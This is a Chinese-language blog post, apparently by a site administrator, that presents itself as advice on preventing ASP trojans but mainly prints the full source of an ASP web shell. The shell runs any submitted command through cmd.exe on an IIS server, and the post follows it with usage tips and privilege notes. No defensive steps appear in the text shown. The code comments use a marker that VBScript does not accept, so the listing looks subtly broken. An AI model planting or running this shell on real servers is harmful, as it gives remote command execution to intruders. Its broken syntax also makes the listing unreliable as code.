隨著ASP 技術的發展,網絡上基於ASP技術開發的網站越來越多,對ASP技術的支持可以說已經是windows系統IIS服務器的一項基本功能。但是基於ASP技術的木馬後門,也越來越多,而且功能也越來越強大。由於ASP它本身是服務器提供的一貢服務功能,所以這種ASP腳本的木馬後門,不會被殺毒軟件查殺。被黑客們稱為「永遠不會被查殺的後門」。由於其高度的隱蔽性和難查殺性,對網站的安全造成了嚴重的威脅。因此針對ASP木馬的防範和清除,為我們的網管人員提出了更高的技術要求。下面我結合個人的經驗,談一下對兩款比較典型的ASP 木馬的防範方法,希望對大家能夠有所幫助。

  以下是第一款木馬的代碼:

<title>ASP Shell</title>
<%@ Language=vbscript %>
<%
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
-- create the COM objects that we will be using --
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
-- check for a command that we have posted --
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
-- Use a poor mans pipe ... a temp file --
szTempFile = "C:" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="執行命令">
</FORM>
<PRE><%
If (IsObject(oFile)) Then
-- Read the output from our command and remove the temp file --
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>

  在命令行裡輸入DIR命令點執行就可以查看目錄了!!它可以使用各種DOS命令,如:copy、net、netstat等。

  但是它的默認執行權限只有GUEST,也就是IUSR_COMPUTER用戶的執行權限。當然如果你把IUSR_COMPUTER用戶加入管理員組,那麼你就有管理員權限了。這一款木馬的特點是,使用很方便。幾乎就想當於DOS命令行窗口xx作一樣。但是如果服務器限制了FSO(無組件上傳),那麼它是沒有辦法使用了。還有就是在服務器以後增加的虛擬主機裡也沒有辦法使用。只能在「默認 Web 站點」裡使用,所以它相對的適用範圍較窄。

arrow
arrow
    全站熱搜

    Neo Chao 發表在 痞客邦 留言(0) 人氣()